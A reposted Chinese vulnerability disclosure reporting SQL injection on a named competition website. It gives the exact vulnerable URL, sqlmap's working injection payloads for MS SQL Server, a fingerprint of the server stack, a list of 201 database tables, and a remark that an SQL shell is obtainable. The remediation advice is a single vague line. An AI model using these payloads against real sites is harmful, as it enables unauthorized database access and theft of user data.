神刀安全网

漏洞标题: 全民竞赛网sql注入

漏洞详情

披露状态:

2016-04-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

全民竞赛网是为政府、企事业单位、学校向公众提供宣传和普及知识的网上竞赛平台。

详细说明:

1.全民竞赛网存在sql注入,注入点:http://www.chinese-js.com/NewsDetail.aspx?id=105192

2.sqlmap验证:

code 区域
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=105192 AND 3822=3822

Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=105192 AND 2609=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2609=2609) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113)))

Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3735=3735) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113))

Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: id=105192;WAITFOR DELAY '0:0:5'--

Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: id=105192 WAITFOR DELAY '0:0:5'

Type: UNION query
Title: Generic UNION query (NULL) - 18 columns
Payload: id=105192 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(106)+CHAR(72)+CHAR(121)+CHAR(121)+CHAR(104)+CHAR(89)+CHAR(68)+CHAR(97)+CHAR(108)+CHAR(77)+CHAR(111)+CHAR(71)+CHAR(109)+CHAR(121)+CHAR(70)+CHAR(80)+CHAR(77)+CHAR(115)+CHAR(102)+CHAR(100)+CHAR(116)+CHAR(75)+CHAR(119)+CHAR(72)+CHAR(67)+CHAR(109)+CHAR(122)+CHAR(99)+CHAR(116)+CHAR(117)+CHAR(102)+CHAR(117)+CHAR(102)+CHAR(106)+CHAR(84)+CHAR(122)+CHAR(104)+CHAR(108)+CHAR(109)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[21:53:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005

3.跑出8个数据库

漏洞标题:  全民竞赛网sql注入

4.当前数据库为:123js,跑出201个表

code 区域
Database: 123js                                                                
[201 tables]
+-------------------------------------+
| City |
| CloudService |
| Competition_temp |
| LinkCN1 |
| LinkCN1 |
| Picture |
| Province |
| View_BranchScore |
| View_Competition_Users |
| View_Question |
| View_tblAdUser |
| View_tblAddMoneyRecord |
| View_tblArticle |
| View_tblCompPrice |
| View_tblCompPrjEvaluation |
| View_tblCompPrjUserComment |
| View_tblCompProject |
| View_tblCompType2 |
| View_tblCompType3 |
| View_tblCreateCompRecord |
| View_tblDS_Branch |
| View_tblDS_Competition |
| View_tblDS_TestStock |
| View_tblDS_UserExamResult |
| View_tblDS_Users |
| View_tblDataDownload |
| View_tblMember |
| View_tblOrder |
| View_tblResearchRecord |
| View_tblSetMealOrder |
| View_tblShareExperience |
| View_tblSuccessfulCase_New |
| View_tblSuccessfulCase_New |
| View_tblSysUser |
| View_tblWeinxin_Huodong |
| View_tblWeinxin_PrizeUser |
| View_tblWeixin_DatiDetail |
| View_tblWeixin_Users |
| View_tblWenda |
| ceshi |
| comd_list |
| t_jiaozhu |
| tata |
| tblAboutUs |
| tblAdUser |
| tblAddMoneyRecord |
| tblArea |
| tblArticle1 |
| tblArticle1 |
| tblArticleHistory |
| tblArticleRemark |
| tblArticleRemarkReport |
| tblArticleType |
| tblAskForAgent |
| tblBlackList_IP |
| tblBlackList_OpenId |
| tblBranchCode |
| tblCarbonFootprint |
| tblCardNo |
| tblCityIP |
| tblCommendAreaInfo |
| tblCommendAreaInfo |
| tblCommendNews |
| tblCompMode |
| tblCompPrice |
| tblCompPrjEvaluation |
| tblCompPrjUserComment |
| tblCompProject |
| tblCompSetMeal |
| tblCompType1 |
| tblCompType1 |
| tblCompType2 |
| tblCompType3 |
| tblCompUserGroup |
| tblCounty |
| tblCreateCompRecord |
| tblDP_CommentProd |
| tblDP_Company |
| tblDP_ProdType1 |
| tblDP_ProdType2 |
| tblDP_ProductInfo |
| tblDS_Advice |
| tblDS_Age |
| tblDS_Area |
| tblDS_Baoming |
| tblDS_Branch |
| tblDS_CommendBBS |
| tblDS_CommendInfo |
| tblDS_CompSolution |
| tblDS_CompetitionAd_Temp |
| tblDS_CompetitionAd_Temp |
| tblDS_CompetitionAd_Temp |
| tblDS_CompetitionPoint |
| tblDS_CompetitionQuestion |
| tblDS_CompetitionType |
| tblDS_Identity |
| tblDS_Industry |
| tblDS_JiYu |
| tblDS_Log |
| tblDS_Neighborhood |
| tblDS_Pic |
| tblDS_PrizeBill_Branch |
| tblDS_PrizeBill_Person |
| tblDS_Street |
| tblDS_TestStockDesc |
| tblDS_TestStockModel |
| tblDS_TestStock_temp |
| tblDS_TestStock_temp |
| tblDS_UserExamResult_Temp |
| tblDS_UserExamResult_Temp |
| tblDS_Users_Temp |
| tblDS_Users_sj_full1 |
| tblDS_Users_sj_full1 |
| tblDS_Work |
| tblDataDownload |
| tblDataDownloadType |
| tblDirect |
| tblFPN_Mutuality |
| tblFriendLink |
| tblFrontPageNews |
| tblFrontPageNewsType |
| tblGetNewsLOG |
| tblGrade |
| tblHomeCommend1 |
| tblHomeCommend1 |
| tblHotNews |
| tblKeyWords |
| tblLeaveWord |
| tblLoginLog |
| tblMember_temp |
| tblMember_temp |
| tblMobile_TestStockScore1 |
| tblMode |
| tblNewsSource1 |
| tblNewsSource1 |
| tblObjective |
| tblOrder |
| tblPhotoVoteActiveLeaveWord |
| tblPhotoVoteActiveLeaveWord |
| tblPhotoVoteDetail |
| tblPhotoVoteInfo |
| tblPhotoVote_PrizeItem |
| tblPhotoVote_PrizeUser |
| tblPicNews |
| tblPicNewsType |
| tblProductInfo |
| tblResearchDetail |
| tblResearchDetail |
| tblResearchRecord |
| tblRight |
| tblRole |
| tblRoleRight |
| tblSetMealOrder |
| tblShareExperience |
| tblSite |
| tblSpecial_Xihui |
| tblSpiderSource |
| tblSuccessfulCaseType |
| tblSuccessfulCase_New |
| tblSuccessfulCase_New |
| tblSunVoteComp |
| tblSunVoteComp |
| tblSunVoteTestStock |
| tblSunVoteUserExamResult |
| tblSunVoteUsers |
| tblSysUser |
| tblTempComp |
| tblTestRandom |
| tblTestRandomType_8 |
| tblTestRandomType_8 |
| tblUnionids |
| tblUserWorks |
| tblUsers |
| tblVisitRecord_cut |
| tblVisitRecord_cut |
| tblVoteActive |
| tblVoteDetail |
| tblVoteInfo |
| tblVoteItem不用 |
| tblVote不用 |
| tblWeinxin_HuodongMode |
| tblWeinxin_HuodongMode |
| tblWeinxin_HuodongPlan |
| tblWeinxin_PrizeItem |
| tblWeinxin_PrizeUser |
| tblWeinxin_RedPacketTotalDetailPlan |
| tblWeinxin_RedPacketTotalDetailPlan |
| tblWeinxin_RedPacketUser |
| tblWeixin_DatiDetail |
| tblWeixin_DatiDetail |
| tblWeixin_Shiti |
| tblWeixin_Users |
| tblWenda |
| tblWendaType |
| tblWhiteList_IP |
| tblWhiteList_OpenId |
| tblWorksMessageBoard |
| tblWorksNotice |
| tet |
| xx |
| 查询 |
+-------------------------------------+

4.可用–sql-shell 写入sql shell进行数据库操作

漏洞标题:  全民竞赛网sql注入

漏洞证明:

如上。

修复方案:

防注入

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 全民竞赛网sql注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址